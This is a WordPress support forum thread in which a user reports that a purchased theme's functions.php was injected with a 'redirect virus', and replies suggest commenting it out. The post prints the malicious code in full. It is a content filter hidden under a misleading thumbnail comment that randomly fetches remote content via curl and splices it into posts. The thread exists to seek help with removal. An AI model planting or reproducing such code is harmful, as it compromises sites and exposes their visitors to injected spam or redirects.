Support » Themes and Templates » [Theme: Propulsion] functions.php injected with redirect virus

  • I’ve got an issue where I’m working with a client who purchased the Propulsion theme and it seems to have been injected with a redirect hack to In the functions.php file, this was added or changed:

    //register additional image thumbnail sizes that should be generated when user uploads an image:
    function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = ""; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false)	{$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}
    add_filter('the_content', 'ins_php_in_post');

    I want to lose it, but I don’t have the code, the client does and he hasn’t given it to me yet. Has anyone else had a similar issue and what is the proper code for this file?

Viewing 2 replies - 1 through 2 (of 2 total)
  • ar.richter


    If you remove the code above with /* [..] */ that should (I’m very sure) solve the problem. No more redirects. Thank you for sharing



    @ar.richter – this thread is 6 months old and this theme is not from WordPress.ORG (and not supported here). Please contact the theme developer about any commercial theme issues.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘[Theme: Propulsion] functions.php injected with redirect virus’ is closed to new replies.